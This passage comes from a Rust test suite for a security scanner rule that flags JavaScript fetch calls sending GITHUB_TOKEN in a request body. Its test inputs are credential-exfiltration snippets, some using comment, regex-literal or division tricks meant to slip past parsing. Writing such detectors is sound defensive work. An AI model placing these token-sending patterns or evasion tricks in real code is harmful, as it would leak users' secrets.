1016    fn test_exfil_js_block_comment_headers_fires() {
1017        let input =
1018            r#"fetch(url, {/* headers: */ body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
1019        let findings = check(input, Some("test.js"));
1020        assert!(
1021            findings
1022                .iter()
1023                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1024            "/* headers: */ inside comment must NOT suppress body exfil"
1025        );
1026    }
1027
1028    #[test]
1029    fn test_exfil_regex_literal_headers_fires() {
1030        let input = r#"fetch(url, {body: /headers: \{/, json: process.env.GITHUB_TOKEN})"#;
1031        let findings = check(input, Some("test.js"));
1032        assert!(
1033            findings
1034                .iter()
1035                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1036            "/headers: .../ inside regex literal must NOT suppress"
1037        );
1038    }
1039
1040    #[test]
1041    fn test_exfil_regex_literal_authorization_fires() {
1042        let input = r#"fetch(url, {body: /Authorization: \[/, json: process.env.GITHUB_TOKEN})"#;
1043        let findings = check(input, Some("test.js"));
1044        assert!(
1045            findings
1046                .iter()
1047                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1048            "/Authorization: .../ inside regex literal must NOT suppress"
1049        );
1050    }
1051
1052    // -----------------------------------------------------------------------
1053    // Division across newlines must not truncate call span
1054    // -----------------------------------------------------------------------
1055
1056    #[test]
1057    fn test_exfil_multiline_division_fires() {
1058        let input = "fetch(url, {body: 1\n/ 2, json: process.env.GITHUB_TOKEN})";
1059        let findings = check(input, Some("test.js"));
1060        assert!(
1061            findings
1062                .iter()
1063                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1064            "multiline division should not break parser"
1065        );
1066    }
1067
1068    #[test]
1069    fn test_exfil_multiline_paren_division_fires() {
1070        let input = "fetch(url, {body: (a\n/ b), json: process.env.GITHUB_TOKEN})";
1071        let findings = check(input, Some("test.js"));
1072        assert!(
1073            findings
1074                .iter()
1075                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1076            "parenthesized multiline division should not break parser"
1077        );
1078    }
1079
1080    #[test]
1081    fn test_find_call_end_multiline_division() {
1082        let input = b"url, {body: 1\n/ 2, val})";
1083        assert_eq!(find_call_end(input, 0), Some(24));
1084    }
1085
1086    // -----------------------------------------------------------------------
1087    // Postfix ++/-- before division must not truncate call span
1088    // -----------------------------------------------------------------------
1089
1090    #[test]
1091    fn test_exfil_postfix_increment_division_fires() {
1092        let input = r#"fetch(url, {body: a++ / 2, json: process.env.GITHUB_TOKEN})"#;
1093        let findings = check(input, Some("test.js"));
1094        assert!(
1095            findings
1096                .iter()
1097                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1098            "a++ / 2 should not break parser"
1099        );
1100    }
1101
1102    #[test]
1103    fn test_exfil_postfix_decrement_division_fires() {
1104        let input = r#"fetch(url, {body: a-- / 2, json: process.env.GITHUB_TOKEN})"#;
1105        let findings = check(input, Some("test.js"));
1106        assert!(
1107            findings
1108                .iter()
1109                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1110            "a-- / 2 should not break parser"
1111        );
1112    }
1113
1114    #[test]
1115    fn test_find_call_end_postfix_increment() {
1116        let input = b"url, {body: a++ / 2, val})";
1117        assert_eq!(find_call_end(input, 0), Some(26));
1118    }
1119
1120    #[test]
1121    fn test_find_call_end_postfix_decrement() {
1122        let input = b"url, {body: a-- / 2, val})";
1123        assert_eq!(find_call_end(input, 0), Some(26));
1124    }
1125
1126    // -----------------------------------------------------------------------
1127    // Combined: postfix division + non-send property must suppress
1128    // -----------------------------------------------------------------------
1129
1130    #[test]
1131    fn test_exfil_postfix_inc_div_then_meta_no_fire() {
1132        let input = r#"fetch(url, {body: a++ / 2, meta: process.env.GITHUB_TOKEN})"#;
1133        let findings = check(input, Some("test.js"));
1134        assert!(
1135            !findings
1136                .iter()
1137                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1138            "secret in meta: after body: a++ / 2 should NOT fire"
1139        );
1140    }
1141
1142    #[test]
1143    fn test_exfil_postfix_dec_div_then_token_no_fire() {
1144        let input = r#"fetch(url, {body: a-- / 2, token: process.env.GITHUB_TOKEN})"#;
1145        let findings = check(input, Some("test.js"));
1146        assert!(
1147            !findings
1148                .iter()
1149                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1150            "secret in token: after body: a-- / 2 should NOT fire"
1151        );
1152    }
1153}